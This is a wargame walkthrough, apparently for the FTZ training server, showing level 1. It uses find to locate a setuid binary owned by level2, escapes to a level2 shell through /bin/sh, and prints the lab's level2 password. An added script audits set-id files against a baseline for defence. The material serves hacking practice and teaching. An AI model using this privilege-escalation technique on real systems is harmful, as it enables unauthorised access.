Log in as level1 by entering level1 / level1.
Once logged in as level1, check which files and directories are there.
[level1@ftz level1]$ ls -al
total 88
drwxr-xr-x 4 root level1 4096 Jan 16 2009 .
drwxr-xr-x 34 root root 4096 Sep 10 2011 ..
-rw------- 1 root root 1 Jan 15 2010 .bash_history
-rw-r--r-- 1 root root 24 Feb 24 2002 .bash_logout
-rw-rw-r-- 1 root root 224 Feb 24 2002 .bash_profile
-rw-r--r-x 1 root root 151 Feb 24 2002 .bashrc
-rw-r--r-- 1 root root 400 Feb 24 2002 .cshrc
-rw-r--r-- 1 root root 4742 Feb 24 2002 .emacs
-rw-r--r-- 1 root root 162 Feb 24 2002 .epems
-r--r--r-- 1 root root 319 Feb 24 2002 .gtkrc
-rw-r--r-- 1 root root 100 Feb 24 2002 .gvimrc
-rw-r--r-- 1 root root 47 Apr 4 2000 hint
-rw-r--r-- 1 root root 226 Feb 24 2002 .muttrc
-rw-r--r-- 1 root root 367 Feb 24 2002 .profile
drwxr-xr-x 2 root level1 4096 Dec 7 2003 public_html
drwxrwxr-x 2 root level1 4096 Jan 16 2009 tmp
-rw-r--r-- 1 root root 1 May 7 2002 .viminfo
-rw-r--r-- 1 root root 4145 Feb 24 2002 .vimrc
-rw------- 1 root root 106 Mar 6 2000 .Xauthority
-rw-r--r-- 1 root root 245 Feb 24 2002 .Xdefaults
There is a file named hint. Reading the hint file gives:
[level1@ftz level1]$ cat hint
level2 권한에 setuid가 걸린 파일을 찾는다.
The hint says to find a file that has setuid set with level2's privileges. To find it, use the find command learned in trainer10.
[level1@ftz level1]$ find / -perm +6000 -user level2 2> /dev/null
/bin/ExecuteMe
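The -perm +6000 option matches files on which at least one of the setuid or setgid bits is set; combined with -user level2, it finds such files owned by level2.
2> /dev/null means that all error output is discarded.
Without 2> /dev/null, the error messages are printed as well: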
[level1@ftz level1]$ find / -perm +6000 -user level2
find: /lost+found: Permission denied
find: /boot/lost+found: Permission denied
find: /proc/1/fd: Permission denied
find: /proc/2/fd: Permission denied
find: /proc/3/fd: Permission denied
find: /proc/4/fd: Permission denied
find: /proc/9/fd: Permission denied
find: /proc/5/fd: Permission denied
find: /proc/6/fd: Permission denied
find: /proc/7/fd: Permission denied
find: /proc/8/fd: Permission denied
find: /proc/10/fd: Permission denied
find: /proc/11/fd: Permission denied
find: /proc/19/fd: Permission denied
find: /proc/77/fd: Permission denied
find: /proc/1168/fd: Permission denied
find: /proc/1481/fd: Permission denied
find: /proc/1538/fd: Permission denied
find: /proc/1542/fd: Permission denied
find: /proc/1560/fd: Permission denied
find: /proc/1579/fd: Permission denied
find: /proc/1646/fd: Permission denied
find: /proc/1683/fd: Permission denied
find: /proc/1717/fd: Permission denied
find: /proc/1726/fd: Permission denied
find: /proc/1736/fd: Permission denied
find: /proc/1745/fd: Permission denied
find: /proc/1754/fd: Permission denied
find: /proc/1801/fd: Permission denied
find: /proc/1809/fd: Permission denied
find: /proc/1832/fd: Permission denied
find: /proc/.1833/fd: Permission denied
find: /proc/.1834/fd: Permission denied
find: /proc/.1835/fd: Permission denied
find: /proc/.1836/fd: Permission denied
find: /proc/.1837/fd: Permission denied
find: /proc/.1838/fd: Permission denied
find: /proc/.1839/fd: Permission denied
find: /proc/.1840/fd: Permission denied
find: /proc/1884/fd: Permission denied
find: /proc/1885/fd: Permission denied
find: /proc/1886/fd: Permission denied
find: /proc/1887/fd: Permission denied
find: /proc/1888/fd: Permission denied
find: /proc/1889/fd: Permission denied
find: /proc/1890/fd: Permission denied
find: /proc/1893/fd: Permission denied
find: /proc/2900/fd: Permission denied
find: /proc/2902/fd: Permission denied
find: /var/lib/slocate: Permission denied
find: /var/lib/nfs/statd: Permission denied
find: /var/lib/dav: Permission denied
find: /var/lib/mysql/mysql: Permission denied
find: /var/lib/mysql/test: Permission denied
find: /var/lib/pgsql: Permission denied
find: /var/log/httpd: Permission denied
find: /var/log/squid: Permission denied
find: /var/log/samba: Permission denied
find: /var/cache/mod_ssl: Permission denied
find: /var/cache/alchemist/printconf.rpm: Permission denied
find: /var/cache/alchemist/printconf.local: Permission denied
find: /var/run/sudo: Permission denied
find: /var/spool/at: Permission denied
find: /var/spool/clientmqueue: Permission denied
find: /var/spool/mqueue: Permission denied
find: /var/spool/cron: Permission denied
find: /var/spool/squid: Permission denied
find: /var/empty/sshd: Permission denied
find: /var/tux: Permission denied
find: /etc/sysconfig/pgsql: Permission denied
find: /etc/default: Permission denied
find: /etc/httpd/conf/ssl.crl: Permission denied
find: /etc/httpd/conf/ssl.crt: Permission denied
find: /etc/httpd/conf/ssl.csr: Permission denied
find: /etc/httpd/conf/ssl.key: Permission denied
find: /etc/httpd/conf/ssl.prm: Permission denied
find: /root: Permission denied
find: /usr/share/ssl/CA: Permission denied
/bin/ExecuteMe
find: /home/clear: Permission denied
find: /home/level10/program: Permission denied
find: /home/level5/tmp: Permission denied
find: /home/trainer1: Permission denied
find: /home/trainer10: Permission denied
find: /home/trainer2: Permission denied
find: /home/trainer3: Permission denied
find: /home/trainer4: Permission denied
find: /home/trainer5: Permission denied
find: /home/trainer6: Permission denied
find: /home/trainer7: Permission denied
find: /home/trainer8: Permission denied
find: /home/trainer9: Permission denied
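The -perm test used in the find command above, as an added example that is not part of the original post: it builds constructed files in a temporary directory, compares the match forms, and lists set-id files owned by a user that are missing from an approved baseline. Current GNU find no longer accepts the +6000 spelling and writes the same any-bit match as -perm /6000, which is what the example uses; the function names, file names and baseline file are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post. File names, function names and
# the baseline file are constructed for illustration.

make_fixture() {
    # Create a scratch directory holding four constructed files; print its path.
    dir=$(mktemp -d) || return 1
    for f in plain suid sgid both; do : > "$dir/$f"; done
    chmod 0755 "$dir/plain"   # no special bits
    chmod 4755 "$dir/suid"    # setuid only
    chmod 2755 "$dir/sgid"    # setgid only
    chmod 6755 "$dir/both"    # setuid and setgid
    printf '%s\n' "$dir"
}

match_perm() {
    # $1 = directory, $2 = argument passed to -perm.
    # Prints the matching file names, sorted, on one line.
    find "$1" -type f -perm "$2" 2>/dev/null | sed 's|.*/||' | sort | paste -sd ' ' -
}

unexpected_setid() {
    # $1 = directory, $2 = owner (name or numeric uid), $3 = baseline file
    # listing approved paths, one per line. Prints set-id files owned by $2
    # that the baseline does not list.
    find "$1" -type f -user "$2" -perm /6000 2>/dev/null | sort | grep -Fxv -f "$3" || :
}

# Demo run on the constructed fixture.
d=$(make_fixture) || exit 1
printf '%s\n' "$d/suid" > "$d/baseline"    # only "suid" is approved
echo "/6000 (any bit set):   $(match_perm "$d" /6000)"
echo "-6000 (all bits set):  $(match_perm "$d" -6000)"
echo "-4000 (setuid set):    $(match_perm "$d" -4000)"
echo "not in the baseline:"
unexpected_setid "$d" "$(id -u)" "$d/baseline"
rm -rf "$d"
```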
Trying to move into /bin/ExecuteMe with the cd command:
[level1@ftz level1]$ cd /bin/ExecuteMe
-bash: cd: /bin/ExecuteMe: Not a directory
This is the message that appears. It shows that ExecuteMe is not a directory.
[level1@ftz level1]$ cd /bin
[level1@ftz bin]$
After entering the command above to move to the bin directory, running the ExecuteMe file gives:
[level1@ftz bin]$ ./ExecuteMe
레벨2의 권한으로 당신이 원하는 명령어를
한가지 실행시켜 드리겠습니다.
(단, my-pass 와 chmod는 제외)
어떤 명령을 실행시키겠습니까?
[level2@ftz level2]$
It says that it will run one command, with my-pass and chmod excluded.
So enter a shell command (sh, bash, /bin/sh or /bin/bash), which lets you keep the level2 account's privileges.
[level1@ftz bin]$ ./ExecuteMe
레벨2의 권한으로 당신이 원하는 명령어를
한가지 실행시켜 드리겠습니다.
(단, my-pass 와 chmod는 제외)
어떤 명령을 실행시키겠습니까?
[level2@ftz level2]$ /bin/sh
sh-2.05b$ my-pass
Level2 Password is "hacker or cracker".
We have obtained the level2 password!!!!